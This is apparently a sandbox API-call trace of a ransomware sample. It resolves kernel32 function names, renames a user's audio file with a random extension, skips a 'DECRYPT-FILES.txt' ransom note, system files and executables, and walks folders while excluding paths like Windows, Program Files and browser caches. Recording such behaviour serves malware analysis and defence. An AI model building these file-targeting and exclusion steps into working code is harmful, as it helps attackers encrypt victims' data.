returned="CreatePrivateNamespaceA" [0085.667] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.668] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.668] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.668] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.668] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.668] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.668] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.668] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.668] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.668] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.668] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.668] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.668] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.668] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.668] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.668] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.668] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.668] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.668] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.669] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.669] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.669] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.669] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.669] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.669] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.669] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.669] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.669] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.669] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.669] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.669] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.669] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.669] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.669] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.669] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.669] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.669] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.670] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.670] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.670] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.670] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.670] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.670] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.670] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.670] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.670] lstrlenA (lpString="DELETEATOM") returned 10 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.670] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.670] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.670] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.670] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.670] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.670] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.670] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.670] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.670] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.670] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.670] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.671] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.671] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.671] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.671] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.671] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.671] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.671] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.671] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.671] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.671] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.671] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.671] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.671] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.671] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.671] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.671] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.671] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.672] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.672] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.672] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.672] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.672] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.672] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.672] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.672] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.672] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.672] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.672] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.672] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.673] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.673] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.673] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.673] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav") returned 62 [0085.673] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav.4O00n1A") returned 70 [0085.673] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_l6zxqpize3shzvn.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\f_l6zxQPIZe3sHzvN.wav.4O00n1A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\f_l6zxqpize3shzvn.wav.4o00n1a"), dwFlags=0x0) returned 1 [0085.674] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.674] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.674] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.674] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf37e300, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.674] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.674] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.674] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.674] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.674] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.675] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.675] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.675] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.675] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.675] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.675] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.675] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.675] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.675] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.675] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0085.675] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.675] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0085.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\jkbimi8.tmp" [0085.675] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.675] CloseHandle (hObject=0x0) returned 0 [0085.675] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.676] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf37e300, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0085.676] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.676] CloseHandle (hObject=0x410) returned 1 [0085.676] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0x9d129120, ftLastAccessTime.dwHighDateTime=0x1d4d51b, ftLastWriteTime.dwLowDateTime=0x9d129120, ftLastWriteTime.dwHighDateTime=0x1d4d51b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp", cAlternateFileName="ZUT2TH~1")) returned 1 [0085.676] lstrcmpW (lpString1="zUt2ThE-zNirRyoAwYp", lpString2=".") returned 1 [0085.676] lstrcmpW (lpString1="zUt2ThE-zNirRyoAwYp", lpString2="..") returned 1 [0085.676] lstrcatW (in: lpString1="zUt2ThE-zNirRyoAwYp", lpString2="\\" | out: lpString1="zUt2ThE-zNirRyoAwYp\\") returned="zUt2ThE-zNirRyoAwYp\\" [0085.676] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="zUt2ThE-zNirRyoAwYp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\" [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Program Files") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch=":\\Windows") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Games\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\", lpSrch="\\All Users") returned 0x0 [0085.676] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 